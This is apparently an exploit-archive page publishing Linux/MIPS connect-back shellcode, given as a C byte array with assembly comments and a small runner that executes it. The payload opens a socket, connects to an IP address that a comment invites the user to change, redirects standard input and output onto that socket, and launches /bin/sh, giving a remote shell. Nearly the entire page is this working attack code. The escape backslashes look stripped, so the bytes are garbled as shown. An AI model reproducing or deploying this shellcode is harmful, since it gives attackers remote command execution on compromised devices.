[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
# Published : 2011-12-10
# Author :
# Previous Title : OSX universal ROP shellcode
# Next Title : Linux x86 egghunt shellcode
/*
* Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
* Author: rigan - imrigan [sobachka] gmail.com
*/
#include <stdio.h>
char sc[] =
"x24x0fxffxfd" // li t7,-3
"x01xe0x20x27" // nor a0,t7,zero
"x01xe0x28x27" // nor a1,t7,zero
"x28x06xffxff" // slti a2,zero,-1
"x24x02x10x57" // li v0,4183 ( sys_socket )
"x01x01x01x0c" // syscall 0x40404
"xafxa2xffxff" // sw v0,-1(sp)
"x8fxa4xffxff" // lw a0,-1(sp)
"x24x0fxffxfd" // li t7,-3 ( sa_family = AF_INET )
"x01xe0x78x27" // nor t7,t7,zero
"xafxafxffxe0" // sw t7,-32(sp)
"x3cx0ex7ax69" // lui t6,0x7a69 ( sin_port = 0x7a69 )
"x35xcex7ax69" // ori t6,t6,0x7a69
"xafxaexffxe4" // sw t6,-28(sp)
/* ==================== You can change ip here ;) ====================== */
"x3cx0dxc0xa8" // lui t5,0xc0a8 ( sin_addr = 0xc0a8 ...
"x35xadx01x64" // ori t5,t5,0x164 ...0164 )
/* ====================================================================== */
"xafxadxffxe6" // sw t5,-26(sp)
"x23xa5xffxe2" // addi a1,sp,-30
"x24x0cxffxef" // li t4,-17 ( addrlen = 16 )
"x01x80x30x27" // nor a2,t4,zero
"x24x02x10x4a" // li v0,4170 ( sys_connect )
"x01x01x01x0c" // syscall 0x40404
"x24x0fxffxfd" // li t7,-3
"x01xe0x28x27" // nor a1,t7,zero
"x8fxa4xffxff" // lw a0,-1(sp)
//dup2_loop:
"x24x02x0fxdf" // li v0,4063 ( sys_dup2 )
"x01x01x01x0c" // syscall 0x40404
"x20xa5xffxff" // addi a1,a1,-1
"x24x01xffxff" // li at,-1
"x14xa1xffxfb" // bne a1,at, dup2_loop
"x28x06xffxff" // slti a2,zero,-1
"x3cx0fx2fx2f" // lui t7,0x2f2f
"x35xefx62x69" // ori t7,t7,0x6269
"xafxafxffxf4" // sw t7,-12(sp)
"x3cx0ex6ex2f" // lui t6,0x6e2f
"x35xcex73x68" // ori t6,t6,0x7368
"xafxaexffxf8" // sw t6,-8(sp)
"xafxa0xffxfc" // sw zero,-4(sp)
"x27xa4xffxf4" // addiu a0,sp,-12
"x28x05xffxff" // slti a1,zero,-1
"x24x02x0fxab" // li v0,4011 ( sys_execve )
"x01x01x01x0c"; // syscall 0x40404
void main(void)
{
void(*s)(void);
printf("size: %dn", sizeof(sc));
s = sc;
s();
}